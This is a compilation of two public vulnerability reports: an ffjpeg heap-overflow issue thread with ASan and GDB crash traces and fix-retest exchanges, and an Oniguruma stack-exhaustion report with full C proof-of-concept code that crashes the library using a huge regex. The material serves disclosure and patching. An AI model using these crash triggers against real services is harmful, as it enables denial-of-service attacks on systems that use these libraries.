      Poisoned by user:      f7
      ASan internal:         fe
    ==17308== ABORTING
    

**GDB report**

    Starting program: /home/aota10/MARS_fuzzcompare/test/ffjpeg/build_normal/ffjpeg -d poc22-jfif_load-heapoverflow 
    file eof !
    *** Error in `/home/aota10/MARS_fuzzcompare/test/ffjpeg/build_normal/ffjpeg': munmap_chunk(): invalid pointer: 0x000000000060a210 ***
    
    Program received signal SIGABRT, Aborted.
    0x00007ffff7a47c37 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
    56      ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
    (gdb) bt
    #0  0x00007ffff7a47c37 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
    #1  0x00007ffff7a4b028 in __GI_abort () at abort.c:89
    #2  0x00007ffff7a842a4 in __libc_message (do_abort=do_abort@entry=1, 
        fmt=fmt@entry=0x7ffff7b96350 "*** Error in `%s': %s: 0x%s ***\n") at ../sysdeps/posix/libc_fatal.c:175
    #3  0x00007ffff7a8f007 in malloc_printerr (action=<optimized out>, 
        str=0x7ffff7b966d0 "munmap_chunk(): invalid pointer", ptr=<optimized out>) at malloc.c:4998
    #4  0x0000000000402416 in jfif_load (file=0x7fffffffe58c "poc22-jfif_load-heapoverflow")
        at /home/aota10/MARS_fuzzcompare/test/ffjpeg/code/jfif.c:257
    #5  0x000000000040165b in main (argc=3, argv=0x7fffffffe298)
        at /home/aota10/MARS_fuzzcompare/test/ffjpeg/code/ffjpeg.c:24
    (gdb) 
    

rockcarry added a commit that referenced this issue

Aug 19, 2019

i make a new commit

commit b3039ae

which fix issue #10 #11 and #12

can you test again ?

This was referenced

Aug 19, 2019

Copy link

Contributor Author

Hi, I tested it with commit b3039ae

but there still exists some buffer overflows in jfif.c:195; jfif.c:216, jfif.c:228 and jfif.c:231

here are the POCs and asan log  
asan.log  
ffjpeg\_poc.zip

rockcarry added a commit that referenced this issue

Aug 19, 2019

Copy link

Contributor Author

Hi,

I tested it with commit 6bc54ed

and AddressSanitizer still reports heap-buffer-overflow in jfif.c:216 and jfif.c:231, which is caused by  
id:000026 & id:000029 in the ffjpeg\_poc.zip above.

to use AddressSanitizer you can compile program with cmd

    $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g"  cmake .
    $ make
    

Cheers

are the test case 16 & 25 pass your testing ?  
and the case 26 & 29 still failed ?

I don't have the test enviroment, can you tell me how to install the AddressSanitizer?

Copy link

Contributor Author

Hi,

> are the test case 16 & 25 pass your testing ?  
> and the case 26 & 29 still failed ?

Yes, 26 & 29 still fail while 16 & 25 pass.

> I don't have the test enviroment, can you tell me how to install the AddressSanitizer?

AddressSanitizer is part of gcc since gcc-4.8, not sure whether it can be installed separately. Here (ASANwiki) is the guide to build the ASAN from source, though I think use ASAN in gcc cost less effort

Cheers

rockcarry added a commit that referenced this issue

Aug 21, 2019

rockcarry added a commit that referenced this issue

Aug 21, 2019

Copy link

Contributor Author

Hi,

I tested commit 2ad299a and ASAN reports heap buffer overflow in

for (i\=1; i<1+16; i++) len += dht\[i\];

Maybe it should be changed to

for (i\=1; i<1+16 && dht+i<end; i++) len += dht\[i\];

This would fix the overflow problem but I'm not sure if this logic is right.

Best wishes

rockcarry added a commit that referenced this issue

Aug 21, 2019

pls test commit 58b6f94  
i think it‘s ok now.

Copy link

Contributor Author

Hi,

I tested commit 58b6f94. Since no more ASAN reports, I think this series of heap-overflow problems are fixed now.

Cheers!

2 participants

CVE-2019-16352: AddressSanitizer: heap-buffer-overflow in jfif_load() at jfif.c:187 · Issue #12 · rockcarry/ffjpeg

Oniguruma before 6.9.3 allows Stack Exhaustion in regcomp.c because of recursion in regparse.c.

If Oniguruma try to parse very deep regex nodes, it causes stack buffer overflow due to deep recursive calls to some parsing functions like optimize\_nodes(), tree\_min\_len().

Here is a POC source code that simply executes onig\_search() with very large regular expression "X+++++++++++++++++++++++++++++++ .... ".

/\*
 \* oniguruma\_sbof.c
 \*/
#include <stdio.h\>
#include <stdlib.h\>
#include <string.h\>
#include "oniguruma.h"

extern int exec(OnigSyntaxType\* syntax, char\* apattern, char\* astr)
{
  int r;
  unsigned char \*start, \*range, \*end;
  regex\_t\* reg;
  OnigErrorInfo einfo;
  OnigRegion \*region;
  UChar\* pattern = (UChar\* )apattern;
  UChar\* str     = (UChar\* )astr;

  r = onig\_new(&reg, pattern, pattern + strlen((char\* )pattern),
               ONIG\_OPTION\_DEFAULT, ONIG\_ENCODING\_ASCII, syntax, &einfo);
  if (r != ONIG\_NORMAL) {
    char s\[ONIG\_MAX\_ERROR\_MESSAGE\_LEN\];
    onig\_error\_code\_to\_str((UChar\* )s, r, &einfo);
    fprintf(stderr, "ERROR: %s\\n", s);
    return -1;
  }

  region = onig\_region\_new();

  end   = str + strlen((char\* )str);
  start = str;
  range = end;
  r = onig\_search(reg, str, end, start, range, region, ONIG\_OPTION\_NONE);
  if (r >= 0) {
    int i;

    fprintf(stderr, "match at %d\\n", r);
    for (i = 0; i < region->num\_regs; i++) {
      fprintf(stderr, "%d: (%d\-%d)\\n", i, region->beg\[i\], region->end\[i\]);
    }
  }
  else if (r == ONIG\_MISMATCH) {
    fprintf(stderr, "search fail\\n");
  }
  else { /\* error \*/
    char s\[ONIG\_MAX\_ERROR\_MESSAGE\_LEN\];
    onig\_error\_code\_to\_str((UChar\* )s, r);
    fprintf(stderr, "ERROR: %s\\n", s);
    onig\_region\_free(region, 1 /\* 1:free self, 0:free contents only \*/);
    onig\_free(reg);
    return -1;
  }

  onig\_region\_free(region, 1 /\* 1:free self, 0:free contents only \*/);
  onig\_free(reg);
  return 0;
}

#define REGEX\_SZ 0x10000

extern int main(int argc, char\* argv\[\])
{
  int r, i;

  OnigEncoding use\_encs\[\] = { ONIG\_ENCODING\_ASCII };
  char regex\[REGEX\_SZ\] = {0};  
  regex\[0\] = 'X';
  for (i = 1; i < REGEX\_SZ; i++) regex\[i\] = '+';

  onig\_initialize(use\_encs, sizeof(use\_encs)/sizeof(use\_encs\[0\]));
  
  r = exec(ONIG\_SYNTAX\_RUBY, regex, "bgc");

  onig\_end();
  return r;
}

    gcc -g -o oniguruma_stack oniguruma_stack.c -lonig
    ./oniguruma_stack
    Segmentation fault (core dumped)
    

    gdb -q ./oniguruma_syntax -c core
    Reading symbols from ./oniguruma_stack...done.                                        
    [New LWP 19257]                                                                       
    Core was generated by `./oniguruma_stack'.                                            
    Program terminated with signal SIGSEGV, Segmentation fault.                           
    #0  0x00007fe64f65fde5 in tree_min_len (                                              
        node=<error reading variable: Cannot access memory at address 0x7ffcc7ec9fe8>,    
        env=<error reading variable: Cannot access memory at address 0x7ffcc7ec9fe0>)     
        at regcomp.c:2839                                                                 
    2839    {                                                                             
    (gdb) bt                    
    #0  0x00007fe64f65fde5 in tree_min_len (                                              
        node=<error reading variable: Cannot access memory at address 0x7ffcc7ec9fe8>,    
        env=<error reading variable: Cannot access memory at address 0x7ffcc7ec9fe0>)     
        at regcomp.c:2839
    #1  0x00007fe64f660196 in tree_min_len (node=0x55b2d734a570, env=0x7ffcc86b7470)
        at regcomp.c:2942
    #2  0x00007fe64f66009b in tree_min_len (node=0x55b2d734a5b0, env=0x7ffcc86b7470)
        at regcomp.c:2913
    #3  0x00007fe64f660196 in tree_min_len (node=0x55b2d734a5f0, env=0x7ffcc86b7470)
        at regcomp.c:2942
    #4  0x00007fe64f66009b in tree_min_len (node=0x55b2d734a630, env=0x7ffcc86b7470)
        at regcomp.c:2913
    #5  0x00007fe64f660196 in tree_min_len (node=0x55b2d734a670, env=0x7ffcc86b7470)
        at regcomp.c:2942
    #6  0x00007fe64f66009b in tree_min_len (node=0x55b2d734a6b0, env=0x7ffcc86b7470)
        at regcomp.c:2913
    #7  0x00007fe64f660196 in tree_min_len (node=0x55b2d734a6f0, env=0x7ffcc86b7470)
        at regcomp.c:2942
    #8  0x00007fe64f66009b in tree_min_len (node=0x55b2d734a730, env=0x7ffcc86b7470)
        at regcomp.c:2913
    #9  0x00007fe64f660196 in tree_min_len (node=0x55b2d734a770, env=0x7ffcc86b7470)
        at regcomp.c:2942
    #10 0x00007fe64f66009b in tree_min_len (node=0x55b2d734a7b0, env=0x7ffcc86b7470)
        at regcomp.c:2913
    #11 0x00007fe64f660196 in tree_min_len (node=0x55b2d734a7f0, env=0x7ffcc86b7470)
        at regcomp.c
    ....

CVE-2019-16163: Stack Exhaustion Problem caused by some parsing functions in regcomp.c making recursive calls to themselves. · Issue #147 · kkos/oniguruma

Tag

#buffer_overflow